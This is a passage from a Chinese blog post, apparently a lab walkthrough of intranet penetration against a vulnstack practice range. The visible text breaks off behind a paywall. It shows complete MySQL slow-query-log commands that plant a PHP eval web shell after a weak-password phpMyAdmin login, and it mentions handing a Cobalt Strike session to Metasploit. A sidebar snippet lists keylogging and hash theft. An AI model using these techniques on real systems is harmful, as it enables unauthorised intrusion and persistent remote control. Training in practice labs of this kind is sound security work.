内网渗透之小试牛刀

最新推荐文章于 2022-11-12 18:45:10 发布
最新推荐文章于 2022-11-12 18:45:10 发布
阅读量1.9k 收藏 4
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/104570240
版权

内网渗透之小试牛刀

  • 离你最近的地方,路途最远。

文章目录

思路:

获取服务器权限->进入内网->判断是否在域中->信息收集(定位域控、域主机、域用户账号密码等)->横向移动(漏洞利用)->拿下域控。

获取权限:

靶场为http://vulnstack.qiyuanxuetang.net/vuln
直接开搞,首先判断yxcms,然后根据版本尝试一些漏洞无果,进而收集端口以及目录,发现phpmyadmin,弱口令进入
在这里插入图片描述通过慢查询日志getshell

show variables like '%slow%'; 
set GLOBAL slow_query_log=on;
set global slow_query_log_file = 'c:/phpstudy/www/1.php';
select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);

在这里插入图片描述 即可获取shell:
在这里插入图片描述

准备工作:

由于菜刀不好用,直接反弹cs,
在这里插入图片描述然后将cs传给msf,首先msf利用exploit/multi/handler监听,然后cs中把msf监听地址以及端口添加到listen并使用forgein进行监听,然后cs中spawn即可。

最低0.47元/天 解锁文章
SoulCat.
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全渗透课程ppt
01-04
WEB安全渗透课程ppt,cisp-pte教材,包含16个章节,涵盖日常常用漏洞解析
渗透之常见命令
03-14
渗透之常见命令,详细列数了渗透的过程中所用到的所有技术,命令
【牛刀小试】——浅析SQL注入
Jack 架构师之路
03-12 1423
引言   SQL注入在当前编程中是非常重要的话题,在较大的Web项目中程序员都在编程的过程中避免SQL的注入,因为有很多站信息的泄露都是因为恶意的SQL注入造成的,比如先前的很多影视站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.所以我们应该对SQL注入有一定的了解并且在编程的过程中有意去避免它。       SQL注入实例  首先
小试牛刀(一)
风轻云淡
09-17 1145
1、有10张饼,每天至少吃一张,问第三天吃完的概率(36/512) 思路:这里的三天吃完,是指恰巧第三天吃完;那么第一天最多吃8张,剩下两天对应的只有1种情况,第一天吃7张,剩下两天对应的有2种情况,第一天吃6张,剩下两天对应的有3种情况,同理依次类推:1+2+3+4+5+6+7+8=36。 10张饼一共有多少种吃发?可以第1天吃完,可以两天吃完,可以三天吃完......最多十天吃完。 方法...
渗透思路
冷风
07-09 2382
渗透思路1.      加固,感染系统盘之外的EXE文件保护目标。2.      上键盘记录和USB插件3. 记录目标杀软。4.      抓取HASH。5.  获取目标络环境,工作组还是域环境。6.  搜索主机是否有络管理软件5.  搜索主机中所有docxls ppt等关键文件,并下载。6.  对方是否使用outlook,下载PST文件并抓取密码。7.      查看对方是否连接过338
安全攻防渗透测试实战指南.pptx
07-01
安全攻防渗透测试实战指南
渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
渗透技术总结大全.pdf
12-22
渗透技术总结大全.pdf
agent内渗透代理相关
最新发布
04-14
渗透代理
电脑教程内渗透之内穿透.rar
10-25
电脑教程内渗透之内穿透
wce内渗透
03-23
用于内渗透 抓去密码 抓到管理密码 打开内 突破
这是一个关于内渗透的文档
09-14
这个是属于empire内渗透的这么一篇文档,里面感觉还不错。挺干的吧,适合小白
渗透讲义(1).pdf
06-30
渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内的域渗透
渗透测试技术
09-13
渗透技术,请勿用于非法目的,仅用于技术交流。
渗透常用手法.doc
07-18
渗透常用手法
渗透
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-12 936
渗透测试到达渗透阶段时,我们拿到了位于公主机的权限时,并且能通过挂代理访问到处于内的主机时。这时如果我们想要拿到内主机的权限,那么我们就要开始进行内渗透了。那么,内渗透该如何开始呢?
渗透之PPT票据传递攻击(Pass the Ticket)
qq_53742230的博客
07-31 1499
渗透之票据传递攻击
ARP攻击与防护--小试牛刀
BIGmustang的博客
05-25 1333
大家好,作为络人我们都知道ARP协议是存在BUG的,下面我们来模拟实验攻击一番。 我们提前装备好2台虚拟机,一台win7 , IP配192.168.10.10 ,win7上运行长角牛软件,一台win10 ,IP配置192.168.10.20 。然后用ESPN模拟软件,还有咱们的 长角牛 攻击软件,然后开始行动。 在参数配置完成后,我们进行路由器的IP设置,检查联通性,具体如图所示 关的mAC地址如下图所示 检查完毕,我们络配置正常,下面我们在一台虚拟机上开启长角牛攻击软件 点击开始之后
互联周刊_11年第15期(115盘下载)
kmccbb的专栏
08-08 215
简介:去年,团购站经历了横空出世、跑马圈地的拓展竞速过程;今年,团购站血拼广告的同时,也在寻求新的出路,突破瓶颈。但如果大多数团购站依旧亏本做生意,那么资金链吃紧,成本居高不下,将让团购站进入新一轮...     盘下载地址:  http://u.115.com/
python内渗透
10-24
Python内渗透是指利用Python编写的工具和脚本,通过漏洞利用、端口扫描、密码爆破等方式,获取内中的敏感信息或者控制内主机的过程。常用的Python内渗透工具有reGeorgSocksProxy、ABPTTS等。其中,reGeorgSocksProxy是一款基于HTTP隧道的反向Socks代理工具,可以将本地的TCP流量通过HTTP隧道转发到远程主机,从而实现内穿透。而ABPTTS则是一款基于HTTP隧道的正向TCP代理工具,可以通过HTTP隧道将本地的TCP流量转发到远程主机,从而实现内穿透。除此之外,Python还可以用于编写端口扫描器、密码爆破工具等,用于辅助内渗透

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值